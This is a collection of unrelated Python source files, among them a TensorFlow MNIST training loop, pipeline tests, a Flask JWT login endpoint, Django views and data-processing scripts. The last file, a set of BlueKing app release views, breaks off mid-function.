step = 0
for epoch in range(EPOCHS):
print("epoch ", epoch, "\n-----------\n")
for batch in range(int(mnist.train.labels.shape[0]/BATCH_SIZE)):
step += 1
batch_xs, batch_ys = mnist.train.next_batch(BATCH_SIZE)
summary_result, _ = sess.run( [summary_op, train], feed_dict={images: batch_xs, labels: batch_ys} )
train_writer.add_summary(summary_result, step)
summary_result, acc = sess.run( [summary_op, accuracy], feed_dict={images: mnist.test.images, labels: mnist.test.labels} )
test_writer.add_summary(summary_result, step)
print("Batch ", batch, ": accuracy = ", acc)
train_writer.close()
test_writer.close()
sess.close()
|
python
|
#:::::::::::::::::::::::::
#::
#:: ProjectDependencies/check.py
#::_______________________
#::
#:: Author: Clement BERTHAUD
#::
#:: MIT License
#:: Copyright (c) 2018 ProjectDependencies - Clément BERTHAUD
#::
#:: Permission is hereby granted, free of charge, to any person obtaining a copy
#:: of this software and associated documentation files (the "Software"), to deal
#:: in the Software without restriction, including without limitation the rights
#:: to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#:: copies of the Software, and to permit persons to whom the Software is
#:: furnished to do so, subject to the following conditions:
#::
#:: The above copyright notice and this permission notice shall be included in all
#:: copies or substantial portions of the Software.
#::
#:: THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#:: IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#:: FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#:: AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#:: LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#:: OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#:: SOFTWARE.
#::
#:::::::::::::::::::::::::
import os
import ProjectDependencies.utils
from colorama import Fore, Back, Style
from colorama import init as init_colorama
init_colorama()
def command( iArgs, iFiles, iConfig, iDirs, iKeys ):
ProjectDependencies.utils.notify_ignore_args( iArgs )
ProjectDependencies.utils.smart_gather_wtree_resolve_all_hash_inconsistencies( iDirs, iFiles )
index_list_with_hash = ProjectDependencies.utils.gather_list_with_hash( iFiles["index"] )
# Check for inconsistencies in index against working directory
missing_index_list = []
bFoundMissingIndexedFile = False
for entry in index_list_with_hash:
absolute_entry = iDirs["root"] + entry["file"]
if not os.path.exists( absolute_entry ):
bFoundMissingIndexedFile = True
missing_index_list.append( entry )
if bFoundMissingIndexedFile:
print( "Yeah, you should run download again." )
print( "Here is the list of missing indexed files:" )
print( Fore.RED )
for entry in missing_index_list:
print( ProjectDependencies.utils.make_offset( 4 ) + "missing: " + entry["file"] )
print(Style.RESET_ALL)
else:
print( "Everything's fine, chill out." )
|
python
|
"""
We presume that Channels is operating over a Redis channel_layer here, and use it
explicitly.
"""
from base64 import b64encode
from json import dumps
def message_to_hash(message):
message_hash = b64encode(dumps(message).encode("utf-8"))
return b"semaphore:" + message_hash
async def get_set_message_semaphore(channel_layer, message):
"""Set a semaphore in redis.
Used to prevent sending the same message twice within 2 seconds."""
msg_hash = message_to_hash(message)
async with channel_layer.connection(0) as connection:
return await connection.set(msg_hash, 1, expire=2, exist="SET_IF_NOT_EXIST")
async def clear_message_semaphore(channel_layer, message):
msg_hash = message_to_hash(message)
async with channel_layer.connection(0) as connection:
return await connection.delete(msg_hash)
|
python
|
"""
Configuration for the integration issues tests
"""
import pytest
@pytest.fixture(scope="package", autouse=True)
def xfail():
pytest.xfail("Issues tests need refactored")
|
python
|
import argparse
import json
import logging
import os
import subprocess
import tqdm
import wget
from collections import defaultdict
from datetime import datetime
from pathlib import Path
import numpy as np
import torch
import random
def extracting_log_info(log_files, experiment, logging):
metrics_t2v = defaultdict(list)
metrics_v2t = defaultdict(list)
for file_name in log_files:
output_string = f"{experiment}:\n"
with open(Path("logs_eval") / file_name, 'r') as f:
content_lines = f.read().splitlines()
content_lines = content_lines[-14:]
for line in content_lines:
if 't2v' in line:
metric_entry = line.split('test_t2v_metrics_')[1].split(':')[0]
metrics_t2v[metric_entry].append(float(line.split('test_t2v_metrics_')[1].split(':')[1]))
elif 'v2t' in line:
metric_entry = line.split('test_v2t_metrics_')[1].split(':')[0]
metrics_v2t[metric_entry].append(float(line.split('test_v2t_metrics_')[1].split(':')[1]))
keys = list(metrics_t2v.keys())
for key in keys:
output_string += f"{key}_t2v: {np.mean(metrics_t2v[key]):.1f}, {np.std(metrics_t2v[key], ddof=1):.1f}\n"
for key in keys:
output_string += f"{key}_v2t: {np.mean(metrics_v2t[key]):.1f}, {np.std(metrics_v2t[key], ddof=1):.1f}\n"
logging.info(output_string)
with open(Path("logs_eval") / f"{experiment}_summary.txt", 'w') as f:
f.write(output_string)
def run_exp(experiments, logging):
for experiment in experiments:
logging.info(f"Now running {experiment}")
run_one_exp(experiment, experiments, logging)
def download_configs(experiment, trained_model_path, group_id, seed, timestamp):
new_folder = str(trained_model_path).split('/trained_model.pth')[0]
url_config = f"http://www.robots.ox.ac.uk/~vgg/research/collaborative-experts/data/models/{experiment}/{group_id}/{seed}/{timestamp}/config.json"
config_path = Path(new_folder) / 'config.json'
wget.download(url_config, out=str(config_path))
with open(config_path, 'r') as f:
config_content = json.load(f)
config_content['seed'] = int(seed[-1])
with open(config_path, 'w') as f:
json.dump(config_content, f)
def download_models(experiment, logging, trained_model_path,
group_id, seed, timestamp):
new_folder = str(trained_model_path).split('/trained_model.pth')[0]
if os.path.exists(trained_model_path) is False:
logging.info(f"Downloading model for {seed} since it does not exist on the local machine")
url = f"http://www.robots.ox.ac.uk/~vgg/research/collaborative-experts/data/models/{experiment}/{group_id}/{seed}/{timestamp}/trained_model.pth"
# import pdb; pdb.set_trace()
Path(new_folder).mkdir(exist_ok=True, parents=True)
wget.download(url, out=str(trained_model_path))
else:
logging.info(f"Model already downloaded for {experiment} seed {seed}")
if os.path.exists(Path(new_folder) / 'config.json') is False:
download_configs(experiment, trained_model_path, group_id, seed, timestamp)
else:
logging.info(f"Config already downloaded for {experiment} seed {seed}")
def run_one_exp(experiment, experiments, logging):
group_id = experiments[experiment][0]
with open('exp_to_seed_time.json', 'r') as f:
json_dict = json.load(f)
log_files = []
for (group_id, seed, timestamp) in json_dict[experiment]:
group_id_path = Path("data/saved/models") / experiment / group_id
logging.info("Running evaluation on existent seeds")
(Path("logs_eval")).mkdir(exist_ok=True, parents=True)
trained_model_path = group_id_path / seed / timestamp / 'trained_model.pth'
download_models(experiment, logging, trained_model_path,
group_id, seed, timestamp)
config_path = group_id_path / seed / timestamp / 'config.json'
cmd = f"python test.py --config {config_path} --resume {trained_model_path} --device 0 --eval_from_training_config >&1 | tee logs_eval/log_{group_id}_{seed}.txt"
log_files.append(f"log_{group_id}_{seed}.txt")
logging.info(cmd)
subprocess.call(cmd, shell=True)
logging.info("Now averaging results")
extracting_log_info(log_files, experiment, logging)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--experiments_path", default="misc/experiments-audiocaps.json")
parser.add_argument("--experiment", type=str, default=None)
parser.add_argument(
"--data_dir",
type=Path,
default="data",
)
parser.add_argument(
"--dataset",
type=str,
default="data",
)
parser.add_argument(
"--refresh",
action="store_true",
)
args = parser.parse_args()
os.makedirs('logs', exist_ok=True)
logging.basicConfig(filename=f"logs/{datetime.now().strftime(r'%m%d_%H%M%S')}.log",
level=logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
logging.info(args)
with open(args.experiments_path, "r") as f:
experiments = json.load(f)
if args.experiment is None:
run_exp(experiments, logging)
else:
run_one_exp(args.experiment, experiments, logging)
if __name__ == "__main__":
main()
|
python
|
#!/usr/bin/env python
from __future__ import print_function
"""
test_split_regex_and_collate.py
"""
JOBS_PER_TASK = 5
import os
tempdir = os.path.relpath(os.path.abspath(os.path.splitext(__file__)[0])) + "/"
import sys
import re
# add grandparent to search path for testing
grandparent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
sys.path.insert(0, grandparent_dir)
# module name = script name without extension
module_name = os.path.splitext(os.path.basename(__file__))[0]
# funky code to import by file name
parent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
import ruffus
from ruffus import pipeline_run, pipeline_printout, Pipeline, suffix, regex, formatter, originate, follows, merge, mkdir, posttask, subdivide, transform, collate, split
from ruffus.ruffus_exceptions import RethrownJobError
from ruffus.ruffus_utility import RUFFUS_HISTORY_FILE, CHECKSUM_FILE_TIMESTAMPS
from ruffus.combinatorics import *
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# options
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
try:
from StringIO import StringIO
except:
from io import StringIO
import shutil
import unittest
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# imports
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# use simplejson in place of json for python < 2.6
try:
import json
except ImportError:
import simplejson
json = simplejson
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# Main logic
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
#
# Three starting files
#
original_files = [tempdir + "/original_%d.fa" % d for d in range(3)]
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# Tasks
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
@mkdir(tempdir)
@originate(original_files)
def generate_initial_files(out_name):
with open(out_name, 'w') as outfile:
pass
#
# split_fasta_file
#
@posttask(lambda: sys.stderr.write("\tSplit into %d files each\n" % JOBS_PER_TASK))
@subdivide(generate_initial_files,
regex(r".*\/original_(\d+).fa"), # match original files
[tempdir + r"/files.split.\1.success", # flag file for each original file
tempdir + r"/files.split.\1.*.fa"], # glob pattern
r"\1") # index of original file
def split_fasta_file (input_file, outputs, original_index):
#
# remove previous fasta files
#
success_flag = outputs[0]
output_file_names = outputs[1:]
for f in output_file_names:
os.unlink(f)
#
# create as many files as we are simulating in JOBS_PER_TASK
#
for i in range(JOBS_PER_TASK):
with open(tempdir + "/files.split.%s.%03d.fa" % (original_index, i), "w") as oo:
pass
with open(success_flag, "w") as oo:
pass
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
#
# align_sequences
#
@posttask(lambda: sys.stderr.write("\tSequences aligned\n"))
@transform(split_fasta_file, suffix(".fa"), ".aln") # fa -> aln
def align_sequences (input_file, output_filename):
with open(output_filename, "w") as oo:
oo.write("%s\n" % output_filename)
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
#
# percentage_identity
#
@posttask(lambda: sys.stderr.write("\t%Identity calculated\n"))
@transform(align_sequences, # find all results from align_sequences
suffix(".aln"), # replace suffix with:
[r".pcid", # .pcid suffix for the result
r".pcid_success"]) # .pcid_success to indicate job completed
def percentage_identity (input_file, output_files):
(output_filename, success_flag_filename) = output_files
with open(output_filename, "w") as oo:
oo.write("%s\n" % output_filename)
with open(success_flag_filename, "w") as oo:
pass
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
#
# combine_results
#
@posttask(lambda: sys.stderr.write("\tResults recombined\n"))
@collate(percentage_identity, regex(r".*files.split\.(\d+)\.\d+.pcid"),
[tempdir + r"/\1.all.combine_results",
tempdir + r"/\1.all.combine_results_success"])
def combine_results (input_files, output_files):
"""
Combine all
"""
(output_filename, success_flag_filename) = output_files
with open(output_filename, "w") as out:
for inp, flag in input_files:
with open(inp) as ii:
out.write(ii.read())
with open(success_flag_filename, "w") as oo:
pass
class Test_ruffus(unittest.TestCase):
def setUp(self):
import os
try:
shutil.rmtree(tempdir)
except:
pass
os.makedirs(tempdir)
for f in original_files:
with open(f, "w") as p: pass
def cleanup_tmpdir(self):
os.system('rm -f %s %s' % (os.path.join(tempdir, '*'), RUFFUS_HISTORY_FILE))
#___________________________________________________________________________
#
# test product() pipeline_printout and pipeline_run
#___________________________________________________________________________
def test_collate(self):
self.cleanup_tmpdir()
s = StringIO()
pipeline_printout(s, [combine_results], verbose=5, wrap_width = 10000, pipeline= "main")
self.assertTrue(re.search('Job needs update:.*Missing files.*', s.getvalue(), re.DOTALL) is not None)
#print s.getvalue()
pipeline_run([combine_results], verbose=0, pipeline= "main")
def test_newstyle_collate (self):
"""
As above but create pipeline on the fly using object orientated syntax rather than decorators
"""
#
# Create pipeline on the fly, joining up tasks
#
test_pipeline = Pipeline("test")
test_pipeline.originate(task_func = generate_initial_files,
output = original_files)\
.mkdir(tempdir, tempdir+"/test")
test_pipeline.subdivide( task_func = split_fasta_file,
input = generate_initial_files,
filter = regex(r".*\/original_(\d+).fa"), # match original files
output = [tempdir + r"/files.split.\1.success", # flag file for each original file
tempdir + r"/files.split.\1.*.fa"], # glob pattern
extras = [r"\1"])\
.posttask(lambda: sys.stderr.write("\tSplit into %d files each\n" % JOBS_PER_TASK))
test_pipeline.transform(task_func = align_sequences,
input = split_fasta_file,
filter = suffix(".fa"),
output = ".aln") \
.posttask(lambda: sys.stderr.write("\tSequences aligned\n"))
test_pipeline.transform(task_func = percentage_identity,
input = align_sequences, # find all results from align_sequences
filter = suffix(".aln"), # replace suffix with:
output = [r".pcid", # .pcid suffix for the result
r".pcid_success"] # .pcid_success to indicate job completed
)\
.posttask(lambda: sys.stderr.write("\t%Identity calculated\n"))
test_pipeline.collate(task_func = combine_results,
input = percentage_identity,
filter = regex(r".*files.split\.(\d+)\.\d+.pcid"),
output = [tempdir + r"/\1.all.combine_results",
tempdir + r"/\1.all.combine_results_success"])\
.posttask(lambda: sys.stderr.write("\tResults recombined\n"))
#
# Cleanup, printout and run
#
self.cleanup_tmpdir()
s = StringIO()
test_pipeline.printout(s, [combine_results], verbose=5, wrap_width = 10000)
self.assertTrue(re.search('Job needs update:.*Missing files.*', s.getvalue(), re.DOTALL) is not None)
test_pipeline.run(verbose=0)
#___________________________________________________________________________
#
# cleanup
#___________________________________________________________________________
def tearDown(self):
shutil.rmtree(tempdir)
#
# Necessary to protect the "entry point" of the program under windows.
# see: http://docs.python.org/library/multiprocessing.html#multiprocessing-programming
#
if __name__ == '__main__':
unittest.main()
|
python
|
from django.views.generic import View
from core.models import Cardapio
from django.shortcuts import render
from core.outros.categoriasCardapio import categoriasCardapio
import json
class CardapioView(View):
def get(self, request, *args, **kwargs):
categoria = request.GET.get('categoria')
item_adicionado = request.GET.get('item_adicionado')
id = request.GET.get('id')
carrinho = []
if (request.session.get('carrinho')):
carrinho = json.loads(request.session['carrinho'])
if categoria == None:
context = {
'categoriasCardapio': categoriasCardapio,
'carrinhoTamanho': len(carrinho),
}
return render(request, 'core/cardapio.html', context)
else:
pratosQuery = Cardapio.objects.filter(categoria=categoria)
"""
criar matrix para renderização no template.
"""
cardapioCatArray = []
arrayLinha = []
indexColeta = 2
for i in range(len(pratosQuery)):
if i <= indexColeta:
arrayLinha.append(pratosQuery[i])
if i == indexColeta:
cardapioCatArray.push(arrayLinha)
arrayLinha = []
indexColeta += 3
if len(arrayLinha) > 0:
cardapioCatArray.append(arrayLinha)
if item_adicionado != None:
itemCardapio = Cardapio.objects.get(id=id)
item = {
'id': str(itemCardapio.id),
'nome': str(itemCardapio.nome),
'fotoUrl': str(itemCardapio.foto.url),
'valor': str(itemCardapio.valor),
'descricao': str(itemCardapio.descricao),
}
carrinho.append(item)
carrinhoJSON = json.dumps(carrinho)
request.session['carrinho'] = carrinhoJSON
context = {
'categoria': categoria,
'pratos': cardapioCatArray,
'item_adicionado': item_adicionado,
'carrinhoTamanho': len(carrinho),
}
return render(request, 'core/cardapio.html', context)
|
python
|
import argparse
import logging
import os
from sentiment_analysis.src.managers.survey_replies_manager import SurveyRepliesManager
from utils.data_connection.api_data_manager import APISourcesFetcher
from utils.data_connection.source_manager import Connector
from utils.gcloud.nlp_client import NLPGoogleClient
from utils.utilities import get_last_week, create_list_weeks_years, extract_first_last_weeks, custom_year_week_format
from google.cloud.language_v1 import LanguageServiceClient
from utils.data_connection.factory.redis_factory import RedisFactory
from utils.data_connection.redis_manager import RedisManager
from nested_lookup import nested_lookup
logger = logging.getLogger()
def inject_year_week_sentiment_analysis(db_connector: Connector,
google_client: LanguageServiceClient,
redis_manager: RedisManager,
list_week_year: list,
company_id: str) -> dict:
"""
Inject the week/year to surveys replies manager
:param db_connector: connector
:param google_client: google client
:param redis_manager: redis manager
:param list_week_year: list of weeks years
:param company_id: company target
:return:
"""
week_s, year_s, week_e, year_e = extract_first_last_weeks(list_week_year)
period = {"start_year": year_s,
"start_week": week_s,
"end_year": year_e,
"end_week": week_e}
survey_replies_manager = SurveyRepliesManager(api_manager=APISourcesFetcher(db_connector=db_connector),
google_client=google_client,
redis_manager=redis_manager,
period=period,
company_ids=[company_id])
survey_replies_manager.fetch_data()
survey_replies_manager.process_replies(process_scores_only=True)
return survey_replies_manager.get_results()
def persist_result_redis(company_id: str, processing_result: dict, redis_manager) -> None:
"""
Write the dictionary into redis
:param company_id: str of company id
:param redis_manager: redis manager
:param processing_result: dict to persist into redis
:return:
"""
redis_score_field = "score"
# Empty data
if not processing_result:
logger.warning(msg="No data to be persisted in Redis.")
return
company_redis_data = redis_manager.retrieve(key=company_id,
field=redis_score_field)
processed_data = nested_lookup(redis_score_field, processing_result[company_id])
scores = company_redis_data + processed_data
redis_manager.persist(key=company_id,
field=redis_score_field,
data=scores)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Extract surveys replies from DB and inject to REDIS')
parser.add_argument('--year', help='year of the survey')
parser.add_argument('--week', help='week of the survey')
parser.add_argument("--number_week_to_insert", help="number of week to agglomerate", default=1)
parser.add_argument('--company_id', help='target company id', required=True)
args = parser.parse_args()
target_year = args.year
target_week = args.week
number_week_to_insert = args.number_week_to_insert
company_id = args.company_id
if target_week is None or target_year is None:
target_year, target_week = get_last_week()
connector = Connector(os.getenv("DB_USER"),
os.getenv("DB_PASSWORD"),
os.getenv("DB_HOST"),
os.getenv("DB_PORT"))
g_client = NLPGoogleClient.open_client()
list_week_year = create_list_weeks_years(week=int(target_week),
year=int(target_year),
number_weeks_analyze=int(number_week_to_insert))
weeks = custom_year_week_format(year_weeks=list_week_year)
redis_manager = RedisFactory.build()
processing_result = inject_year_week_sentiment_analysis(db_connector=connector,
google_client=g_client,
redis_manager=redis_manager,
list_week_year=list_week_year,
company_id=company_id)
persist_result_redis(company_id=company_id,
redis_manager=redis_manager,
processing_result=processing_result)
|
python
|
import numpy as np
import os
forcing_filename = os.path.join(os.path.dirname(__file__), 'cmip6_solar.csv')
class Forcing:
forcing = np.loadtxt(forcing_filename, skiprows=7, delimiter=',')
year = forcing[:,0]
solar = forcing[:,1]
|
python
|
import os
import numpy as np
from play_model import PlayModel
class PlayAgent:
def __init__(self, params):
self.parameters = params
os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(self.parameters['tf_log_level']) #reduce log out for tensorflow
self.model = PlayModel(self.parameters)
def get_action(self, state):
q_values = self.model.predict([state])
return np.argmax(q_values)
def __enter__(self):
self.model.__enter__()
def __exit__(self, ty, value, tb):
pass
|
python
|
import pytest
import asyncio
from async_v20.client import OandaClient
@pytest.yield_fixture
@pytest.mark.asyncio
async def client():
oanda_client = OandaClient(rest_host='127.0.0.1', rest_port=8080, rest_scheme='http',
stream_host='127.0.0.1', stream_port=8080, stream_scheme='http',
health_host='127.0.0.1', health_port=8080, health_scheme='http')
yield oanda_client
await oanda_client.close()
await asyncio.sleep(0)
|
python
|
"""
Defines the blueprint for the auth
"""
import uuid
import datetime
from flasgger import swag_from
from flask import Blueprint, request
from flask.json import jsonify
from flask_bcrypt import generate_password_hash, check_password_hash
from flask_jwt_extended import (create_access_token, get_jwt_identity)
from repositories import AuthRepository, UserRepository
AUTH_BLUEPRINT = Blueprint("auth", __name__)
@AUTH_BLUEPRINT.route('/auth', methods=['POST'])
@swag_from("../swagger/auth/POST.yml")
def create():
""" Create a auth """
body = request.get_json()
auth = AuthRepository.getByUsername(body["username"].lower())
expires = datetime.timedelta(days=1)
if not auth:
pw_hash = generate_password_hash(body["password"], 10)
auth = AuthRepository.create(
body["username"].lower(), pw_hash
)
user = UserRepository.create(
body["username"], None, None
)
expires = datetime.timedelta(days=1)
# access_token = create_access_token(identity = { "username": auth.username, "id": auth.id }, expires_delta=expires)
access_token = create_access_token(identity = { "username": auth.username, "id": auth.id })
response = jsonify({"success": True, "access_token": access_token})
response.status_code = 200
return response
validatePassword = check_password_hash(auth.password, body["password"])
if not validatePassword:
response = jsonify({"success": False, "message": "Invalid username or password"})
response.status_code = 200
return response
access_token = create_access_token(identity = { "username": auth.username, "id": auth.id })
AuthRepository.updateToken(id=auth.id, token=access_token)
response = jsonify({"success": True, "access_token": access_token })
response.status_code = 200
return response
|
python
|
import numpy as np
def main():
nx = 2
ny = 3
nz = 4
def do_it(i):
return [i % nx, (i / nx) % ny, i / (nx * ny)]
def undo_it(x, y, z):
# return z + ny * (y + nx * x)
# return x + nx * (x + ny * y)
# return (x * nx * ny) + (y * ny) + z
# return (z * nx * ny) + (nx * y) + x
return nx * ((nx * z) + y) + x
for i in range(nx * ny * nz):
xyz = do_it(i)
print '{}: {}'.format(i, xyz)
uuzz = np.array(xyz)
print '{}: {}'.format(i, undo_it(*uuzz))
# print undo_it(*xyz)
main()
|
python
|
import utils
import euclides
def esCarmichael(p):
# p > 0
# Retorna cert si p és un nombre de carmichael, fals altrament
i = 1
while i < p:
if euclides.sonCoprimers(i, p):
if utils.potencia_modular_eficient(i, p-1, p) != 1:
return False
i += 1
if i == p:
s = utils.factors_primers(p)
if len(set(s)) == len(s) and len(s) >= 3:
return True
return False
|
python
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
from __future__ import unicode_literals
import datetime
import json
from django.conf import settings
from django.http import JsonResponse
from django.views.generic import View
from app.models import App, SecureInfo
from common.constants import ModeEnum, ModeNameDict
from common.exceptions import BadRequestException
from common.log import logger
from common.mixins.base import AppDeveloperRequiredMixin
from common.responses import FailJsonResponse, OKJsonResponse
from common.views.mako import JsonView, MakoTemplateView
from components.engine import get_event_log
from engine.deploy import (app_to_offline_task, app_to_online_task,
app_to_test_task)
from engine.models import BkServer, ThirdServer
from release.constants import (APP_DID_OPERATE_ID_LIST, OPERATE_CODE_LIST, EventStatusEnum,
OperateIDEnum, UserOperateTypeEnum, DeployPageTypeEnum)
from release.models import Record, Version
from release.utils import get_event_status, get_release_home_page_data
from release.utils import record_user_release_operate as _r
class HomeView(AppDeveloperRequiredMixin, MakoTemplateView):
"""发布部署 - 首页
"""
template_name = 'release/home.html'
def get_context_data(self, **kwargs):
context = super(HomeView, self).get_context_data(**kwargs)
request = self.request
app_code = self.kwargs["app_code"]
username = request.user.username
data = get_release_home_page_data(app_code, username)
context.update(data)
return context
class RecordPageView(AppDeveloperRequiredMixin, MakoTemplateView):
"""发布记录
"""
template_name = 'release/record.html'
def get_context_data(self, **kwargs):
context = super(RecordPageView, self).get_context_data(**kwargs)
app_code = self.kwargs["app_code"]
context.update({"app_code": app_code, "tab": "record"})
return context
class AppRecordView(AppDeveloperRequiredMixin, MakoTemplateView):
"""获取发布记录页面
operate_id: 操作对应ID, 0: 全部, 1:提测, 2:上线,3:下架
"""
template_name = 'release/record_list.part'
def get_context_data(self, **kwargs):
context = super(AppRecordView, self).get_context_data(**kwargs)
app_code = self.kwargs["app_code"]
operate_code = self.kwargs["operate_code"]
if operate_code not in OPERATE_CODE_LIST:
raise BadRequestException("operate_code is invalid")
query = Record.objects.query_records(app_code, operate_code, size=100)
record_list = []
for _record in query:
# 提测展示信息
extra_data = _record.get_extra_data()
if not extra_data:
task_detail = ''
extra_msg = '--'
else:
task_detail = extra_data.get("task_detail", "")
if _record.operate_id in [OperateIDEnum.IN_OFFLINE.value, OperateIDEnum.TO_OFFLINE.value]:
_extra_data_mode = extra_data.get("mode", ModeEnum.ALL.value)
_env = ModeNameDict.get(_extra_data_mode, "--")
extra_msg = "选择下架环境:{}".format(_env)
else:
extra_msg = "--"
is_done = _record.operate_id in APP_DID_OPERATE_ID_LIST
record_list.append({
"operate_type": _record.get_operate_id_display(),
"operate_user": _record.operate_user,
"is_success": _record.is_success,
"is_done": is_done,
"operate_time": _record.operate_time_display,
"extra_data": extra_msg,
"detail": _record.message.replace('\n', '<br/>') if _record.message else "没有返回信息!",
"task_detail": task_detail
})
context.update({
"record_list": record_list,
"app_code": app_code,
})
return context
class ReleaseVersion(AppDeveloperRequiredMixin, MakoTemplateView):
"""版本信息
app发布历史版本
"""
template_name = 'release/version.html'
def get_context_data(self, **kwargs):
context = super(ReleaseVersion, self).get_context_data(**kwargs)
app_code = self.kwargs["app_code"]
app = App.objects.get(code=app_code)
version_list = Version.objects.get_version_list(app)
context.update({"app_code": app_code, "version_list": version_list, "tab": "version"})
return context
class DeployPageView(AppDeveloperRequiredMixin, MakoTemplateView):
"""获取部署页面信息
"""
def get_template_names(self):
page_type = self.kwargs["page_type"]
tpl = "release/{}.part".format(page_type)
return [tpl]
def get_context_data(self, **kwargs):
context = super(DeployPageView, self).get_context_data(**kwargs)
app_code = self.kwargs["app_code"]
page_type = self.kwargs["page_type"]
app = App.objects.get(code=app_code)
vcs_info = SecureInfo.objects.get_vcs_info(app_code)
vcs_url = vcs_info.get("VCS_PATH") if vcs_info else '--'
data = {"app": app,
"vcs_url": vcs_url,
"app_code": app_code,
}
if page_type == DeployPageTypeEnum.TEST.value:
data.update({"is_service_rabbitmq_active": ThirdServer.objects.is_rabbitmq_active()})
context.update(data)
return context
class ReleaseTestView(AppDeveloperRequiredMixin, View):
"""app提测
"""
def post(self, request, *args, **kwargs):
app_code = self.kwargs["app_code"]
username = request.user.username
logger.info("[app:%s] 开始进行[测试部署]...", app_code)
app = App.objects.get(code=app_code)
# 检测测试服务器是否激活
is_test_app_deployable = BkServer.objects.check_test_app_deployable()
if not is_test_app_deployable:
message = "当前没有可用的[测试服务器], 无法进行提测操作. 请到<a href='/engine/server/'> [开发者中心-服务器信息] </a> 注册并激活服务器"
logger.info("[app:%s] %s", app_code, message)
return FailJsonResponse(message)
# 只有[下架/开发/测试/上线]状态可操作
can_be_test, message = app.can_be_test()
if not can_be_test:
logger.info("[app:%s] %s", app_code, message)
return FailJsonResponse(message)
# 启用服务
form_data = request.POST.get("form_data", None)
if form_data:
try:
form_data = json.loads(request.POST.get("form_data"))
except Exception as e:
message = "参数错误!"
logger.exception("[app:%s] %s error=%s", app_code, message, str(e))
return BadRequestException(message)
is_use_celery = (form_data.get("is_use_celery") == "checked")
is_use_celery_beat = (form_data.get("is_use_celery_beat") == "checked")
try:
app.trigger_celery(is_use_celery, is_use_celery_beat)
logger.info("update app info [is_use_celery=%s, is_use_celery_beat=%s]",
app.is_use_celery, app.is_use_celery_beat)
except Exception:
logger.exception("Update is_use_celery/is_use_celery_beat fail!")
# 提测
ok, event_id, message = app_to_test_task(app_code, app, username)
# 记录操作流水日志
extra_data = {"username": username, "is_success": ok, "event_id": event_id}
_r(app_code, username, UserOperateTypeEnum.RELEASE_TEST.value, extra_data)
if ok:
message = "测试部署事件提交成功!"
logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
return OKJsonResponse(message, event_id=event_id)
logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
return FailJsonResponse(message, event_id=event_id)
class ReleaseProductionView(AppDeveloperRequiredMixin, View):
"""app上线
"""
def post(self, request, *args, **kwargs):
app_code = self.kwargs["app_code"]
username = request.user.username
logger.info("[app:%s] 开始进行[正式部署]...", app_code)
app = App.objects.get(code=app_code)
try:
form_data = json.loads(request.POST.get("form_data", '{}'))
except Exception as e:
message = "参数错误!"
logger.exception("[app:%s] %s error=%s", app_code, message, e)
return BadRequestException(message)
is_prod_app_deployable = BkServer.objects.check_prod_app_deployable()
if not is_prod_app_deployable:
message = "当前没有可用的[正式服务器], 无法进行提测操作. 请到<a href='/engine/server/'> [开发者中心-服务器信息] </a> 注册并激活服务器"
logger.info("[app:%s] %s", app_code, message)
return FailJsonResponse(message)
# 前端变量不要一直向后, 限制
is_tips = form_data.get("is_tips", 0)
features = form_data.get("features", "")
bugs = form_data.get("bugs", "")
can_be_online, message = app.can_be_online()
if not can_be_online:
logger.info("[app:%s] %s", app_code, message)
return FailJsonResponse(message)
# 上线操作
ok, event_id, message = app_to_online_task(app_code, app, username, is_tips, features, bugs)
# 操作流水日志
extra_data = {"username": username, "form_data": form_data}
_r(app_code, username, UserOperateTypeEnum.RELEASE_ONLINE.value, extra_data)
if not ok:
logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
return FailJsonResponse(message, event_id=event_id)
message = "正式部署事件提交成功!"
logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
return OKJsonResponse(message, event_id=event_id)
class ReleaseOfflineView(AppDeveloperRequiredMixin, MakoTemplateView):
"""app下架
发布部署 - 下架首页
发布部署 - 执行下架
"""
template_name = 'release/home.html'
def get_context_data(self, **kwargs):
context = super(ReleaseOfflineView, self).get_context_data(**kwargs)
request = self.request
app_code = self.kwargs["app_code"]
username = request.user.username
data = get_release_home_page_data(app_code, username, page="unrelease")
context.update(data)
return context
def post(self, request, *args, **kwargs):
app_code = self.kwargs["app_code"]
username = request.user.username
logger.info("[app:%s] 开始进行[下架]...", app_code)
try:
